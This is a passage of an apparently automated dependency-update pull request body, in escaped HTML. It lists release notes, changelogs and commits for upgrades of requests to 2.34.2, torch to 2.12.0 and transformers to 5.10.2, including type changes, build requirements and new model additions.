(2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. \u003cstrong\u003eWe believe types are comprehensive but if you find issues, please\nreport them to the \u003ca href=\"https://redirect.github.com/psf/requests/issues/7271\"\u003epinned tracking issue\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues\nwith \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling\n\u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.0 (2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. We believe types are comprehensive but if you find issues, please\nreport them to the pinned tracking issue.\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\nproxy_bypass implementation has been updated with CPython's fix from\nbpo-39057. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer incorrectly strips duplicate leading slashes in\nURI paths. This should address user issues with specific presigned\nURLs. Note the full fix requires urllib3 2.7.0+. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7315\"\u003e#7315\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6e83187b8feb273ed4c6cdab5efd8d54901dfab3\"\u003e\u003ccode\u003e6e83187\u003c/code\u003e\u003c/a\u003e v2.34.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/84d10f0be83e8f6aeca8a05230c52216431c4d0b\"\u003e\u003ccode\u003e84d10f0\u003c/code\u003e\u003c/a\u003e Move Request.headers back to Mapping (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/b7b549b54571d03950b16afd2d01bc6ff0348224\"\u003e\u003ccode\u003eb7b549b\u003c/code\u003e\u003c/a\u003e v2.34.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/e511bc72777a94c45d004e010c597925092e1efe\"\u003e\u003ccode\u003ee511bc7\u003c/code\u003e\u003c/a\u003e Fix mutability issues with headers input types (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5691f596134c2feb121e595c77a0178921fcce61\"\u003e\u003ccode\u003e5691f59\u003c/code\u003e\u003c/a\u003e Update JsonType containers to read-based collections (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/2144213c307691710c9d665700860fc4993c3035\"\u003e\u003ccode\u003e2144213\u003c/code\u003e\u003c/a\u003e Constrain Response.reason to str (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6404f345e562d962abe6700a1c357ec1e7e18232\"\u003e\u003ccode\u003e6404f34\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eprepare_body\u003c/code\u003e stream detection for \u003ccode\u003e__getattr__\u003c/code\u003e-based file wrappers (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7\"\u003e#7\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/0b401c76b6e80a4eecf3c690085b2553f6e261ca\"\u003e\u003ccode\u003e0b401c7\u003c/code\u003e\u003c/a\u003e v2.34.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/86b378d3f60f828daa13ca50aa82e287ff7b66b4\"\u003e\u003ccode\u003e86b378d\u003c/code\u003e\u003c/a\u003e Align Session.get parameters with requests.get (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7429\"\u003e#7429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a4f9a5999bdb9bf2d6e7c8aa973b28cacb17134f\"\u003e\u003ccode\u003ea4f9a59\u003c/code\u003e\u003c/a\u003e Port bpo-39057 to Requests (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.33.1...v2.34.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `torch` from 2.11.0 to 2.12.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytorch/pytorch/releases\"\u003etorch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ePyTorch 2.12.0 Release Notes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#highlights\"\u003eHighlights\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#backwards-incompatible-changes\"\u003eBackwards Incompatible Changes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#deprecations\"\u003eDeprecations\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#new-features\"\u003eNew Features\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#improvements\"\u003eImprovements\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#bug-fixes\"\u003eBug fixes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#performance\"\u003ePerformance\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#documentation\"\u003eDocumentation\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#developers\"\u003eDevelopers\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#security\"\u003eSecurity\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eHighlights\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eFor more details about these highlighted features, you can look at the release blogpost. Below are the full release notes for this release.\u003c/p\u003e\n\u003ch1\u003eBackwards Incompatible Changes\u003c/h1\u003e\n\u003ch2\u003eBuild Frontend\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eStrengthened SVE compile checks in \u003ccode\u003eFindARM.cmake\u003c/code\u003e, which may reject previously accepted but incorrect SVE configurations (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/176646\"\u003e#176646\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eSource builds that enable SVE now validate the compiler configuration more strictly. If a build previously passed with an incomplete or mismatched SVE setup, it may now fail during CMake configuration instead of later in compilation. Update the compiler/toolchain flags so they accurately describe the target SVE support, or disable SVE for that build.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated the minimum CUDA version required to build PyTorch from source to CUDA 12.6 (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/178925\"\u003e#178925\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eBuilding PyTorch from source with CUDA versions older than 12.6 is no longer supported. Users building custom binaries should install CUDA 12.6 or newer and make sure \u003ccode\u003eCUDA_HOME\u003c/code\u003e points to that installation.\u003c/p\u003e\n\u003cp\u003eVersion 2.11:\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003eCUDA_HOME=/usr/local/cuda-12.4 python setup.py develop\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eVersion 2.12:\u003c/p\u003e\n\u003cpre lang=\"bash\"\u003e\u003ccode\u003eCUDA_HOME=/usr/local/cuda-12.6 python setup.py develop\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eEnforced a C++20 minimum in CMake build files (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/pull/178662\"\u003e#178662\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/0d62256a2b23365f8e1604297eb23a6545102aa8\"\u003e\u003ccode\u003e0d62256\u003c/code\u003e\u003c/a\u003e [release] Dockerfile: skip torchaudio install when CUDA_PATH=cu132 (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/183346\"\u003e#183346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/7661cd9c6b841b62b7f411aa52ec51f05457263b\"\u003e\u003ccode\u003e7661cd9\u003c/code\u003e\u003c/a\u003e [MPS] Fix SDPA wrong output for permuted q/k/v with B \u0026gt; 1 (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/181886\"\u003e#181886\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/9da6087ab64ab6a2118686420ca5353c90dd7e1f\"\u003e\u003ccode\u003e9da6087\u003c/code\u003e\u003c/a\u003e Fix stale PYTORCH_RELEASES_CODE_CC dict (fixes \u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182250\"\u003e#182250\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182369\"\u003e#182369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/e4c37cc011d47246ce8ea4b99c9b28fb7f400224\"\u003e\u003ccode\u003ee4c37cc\u003c/code\u003e\u003c/a\u003e Avoid raw stream name collisions in Inductor (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182178\"\u003e#182178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/822d047dc8dd8d919f83c3ad5c786e405075d1f0\"\u003e\u003ccode\u003e822d047\u003c/code\u003e\u003c/a\u003e [MPS] Fix bool mask handling in 1-pass SDPA decode kernel (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182285\"\u003e#182285\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182311\"\u003e#182311\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/5c5e523cd520e6986006e45be243b3ee927ea546\"\u003e\u003ccode\u003e5c5e523\u003c/code\u003e\u003c/a\u003e Add enable_gqa parameter to SDPA MPS meta registration (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/181550\"\u003e#181550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/eece52ead16886e5463c3dcee9b04db783cc68d5\"\u003e\u003ccode\u003eeece52e\u003c/code\u003e\u003c/a\u003e [AOTI] Add BC-safe c_shim v2 for _scaled_dot_product_attention_math_for_mps e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/b39330bbe210b9628207e84d8ba2cabb7975fbac\"\u003e\u003ccode\u003eb39330b\u003c/code\u003e\u003c/a\u003e [Inductor] Call latest c_shim version for versioned fallback ops (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/181548\"\u003e#181548\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/06f10d088229a25ac52bd14b6cacc04a4161f6ca\"\u003e\u003ccode\u003e06f10d0\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;[FSDP2] add fqn to communication ops\u0026quot; (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182100\"\u003e#182100\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pytorch/pytorch/issues/182157\"\u003e#182157\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/commit/449e3393139a1aca9afec120c9a63f98f12d55b0\"\u003e\u003ccode\u003e449e339\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;[Inductor] Improve materialization heuristic for a chain of computaio...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytorch/pytorch/compare/v2.11.0...v2.12.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `transformers` from 5.7.0 to 5.10.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/huggingface/transformers/releases\"\u003etransformers's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ePatch release v5.10.2\u003c/h1\u003e\n\u003cp\u003eThere was a big bug in the model conversion of models related to clip, this affected models like sam3 and others. Please make sure to update :pray:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix conversion for clip models by \u003ca href=\"https://github.com/zucchini-nlp\"\u003e\u003ccode\u003e@​zucchini-nlp\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46406\"\u003e#46406\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/huggingface/transformers/compare/v5.10.1...v5.10.2\"\u003ehttps://github.com/huggingface/transformers/compare/v5.10.1...v5.10.2\u003c/a\u003e\u003c/p\u003e\n\u003ch1\u003eRelease v5.10.1\u003c/h1\u003e\n\u003cp\u003ev5.10.0 was yanked as we publish on a corrupted branch. Sorry everyone, this happens when we rush a release!!!\u003c/p\u003e\n\u003ch2\u003eNew Model additions\u003c/h2\u003e\n\u003ch3\u003eGemma4 unified+ Gemma4 MTP\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eGemma 4 12B Unified is an \u003cstrong\u003eencoder-free\u003c/strong\u003e multimodal model with pretrained and instruction-tuned variants. Unlike \u003ca href=\"https://github.com/huggingface/transformers/blob/HEAD/gemma4\"\u003estandard Gemma 4\u003c/a\u003e, which uses dedicated encoder towers, Gemma 4 12B Unified projects raw inputs directly into the language model's embedding space through lightweight linear pipelines. This results in a simpler architecture while maintaining strong multimodal performance.\u003c/p\u003e\n\u003cp\u003eKey differences from standard Gemma 4:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eNo Vision Tower\u003c/strong\u003e: Raw pixel patches are projected directly into LM space via a \u003ccode\u003eDense + LayerNorm\u003c/code\u003e pipeline with factorized 2D positional embeddings, replacing the vision encoder.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNo Audio Tower\u003c/strong\u003e: Raw 16 kHz waveform samples are chunked into fixed-length frames and projected through a simple \u003ccode\u003eRMSNorm → Linear\u003c/code\u003e pipeline, replacing the mel spectrogram + Conformer encoder.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eShared Multimodal Pipeline\u003c/strong\u003e: Both vision and audio use the same \u003ccode\u003eGemma4UnifiedMultimodalEmbedder\u003c/code\u003e (RMSNorm → Linear) for the final projection to text hidden space.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eYou can find the original Gemma 4 12B Unified checkpoints under the \u003ca href=\"https://huggingface.co/collections/google/gemma-4\"\u003eGemma 4\u003c/a\u003e release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ewho needs encoders? (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46385\"\u003e#46385\u003c/a\u003e) by \u003ca href=\"https://github.com/douglas-reid\"\u003e\u003ccode\u003e@​douglas-reid\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/sgerrard\"\u003e\u003ccode\u003e@​sgerrard\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/vasqu\"\u003e\u003ccode\u003e@​vasqu\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/molbap\"\u003e\u003ccode\u003e@​molbap\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eSapiens2\u003c/h3\u003e\n\u003cp\u003eSapiens2 is a family of high-resolution vision transformers pretrained on ~1 billion curated human images, designed for human-centric computer vision tasks including pose estimation, body-part segmentation, surface normal estimation, and pointmap estimation. The models scale from 0.4B to 5B parameters and train at native 1K resolution, with hierarchical 4K variants for extended spatial reasoning. Sapiens2 achieves substantial improvements over its predecessor with +4 mAP in pose estimation, +24.3 mIoU in body-part segmentation, and 45.6% error reduction in normal estimation.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/sapiens2\"\u003eDocumentation\u003c/a\u003e | \u003ca href=\"https://huggingface.co/papers/2604.21681\"\u003ePaper\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Sapiens2 Model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45919\"\u003e#45919\u003c/a\u003e) by \u003ca href=\"https://github.com/guarin\"\u003e\u003ccode\u003e@​guarin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/45919\"\u003e#45919\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDeepSeek-OCR-2\u003c/h3\u003e\n\u003cp\u003eDeepSeek-OCR-2 is an OCR-specialized vision-language model built on a distinctive architecture that combines a SAM ViT-B vision encoder with a Qwen2 hybrid attention encoder, connected through an MLP projector to a DeepSeek-V2 Mixture-of-Experts (MoE) language model. The model features a hybrid attention mechanism that applies bidirectional attention over image tokens and causal attention over query tokens, enabling efficient and accurate document understanding. It supports both plain OCR tasks and grounding capabilities with coordinate-aware output for document conversion to markdown format.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/deepseek_ocr2\"\u003eDocumentation\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Deepseek-OCR-2 model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/45075\"\u003e#45075\u003c/a\u003e) by \u003ca href=\"https://github.com/thisisiron\"\u003e\u003ccode\u003e@​thisisiron\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/45075\"\u003e#45075\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMellum\u003c/h3\u003e\n\u003cp\u003eMellum is a code-focused Mixture-of-Experts language model developed by JetBrains. It is derived from the Qwen3-MoE architecture with per-layer-type RoPE and interleaved sliding window attention. The model has 12B total parameters with 2.5B active parameters per token, using 64 routed experts with 8 activated per token across 28 layers.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eLinks:\u003c/strong\u003e \u003ca href=\"https://huggingface.co/docs/transformers/main/en/model_doc/mellum\"\u003eDocumentation\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Add support for JetBrains' \u003ccode\u003eMellum\u003c/code\u003e v2 code generation model (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46112\"\u003e#46112\u003c/a\u003e) by \u003ca href=\"https://github.com/shadeMe\"\u003e\u003ccode\u003e@​shadeMe\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/huggingface/transformers/pull/46112\"\u003e#46112\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/0dad7b822255a0ae261ec45ae937371e859ffd1a\"\u003e\u003ccode\u003e0dad7b8\u003c/code\u003e\u003c/a\u003e v5.10.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/8a4ffee847b90a732a1febefeca5180fffd5596f\"\u003e\u003ccode\u003e8a4ffee\u003c/code\u003e\u003c/a\u003e Fix conversion for clip models (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46406\"\u003e#46406\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/90c3ae54d448d4906b6167317ea5a7f5d48a232d\"\u003e\u003ccode\u003e90c3ae5\u003c/code\u003e\u003c/a\u003e Patch because we had to yank 5.10 because the release branch was not up to date\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/0bd94b37db639d8f29a094dce2fde06f86af8968\"\u003e\u003ccode\u003e0bd94b3\u003c/code\u003e\u003c/a\u003e v5.10.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/1423d22f7a3b62e8c70ad67b58ec25cd9b675897\"\u003e\u003ccode\u003e1423d22\u003c/code\u003e\u003c/a\u003e who needs encoders? (\u003ca href=\"https://redirect.github.com/huggingface/transformers/issues/46385\"\u003e#46385\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/huggingface/transformers/commit/50eb20a24f9dd512e6770072f422e4b86ca3cd98\"\u003e\u003ccode\u003e50eb20a\u003c/code\u003e\u003c/a\u003e Fix dsv4 dequant + tp/ep (\u003ca 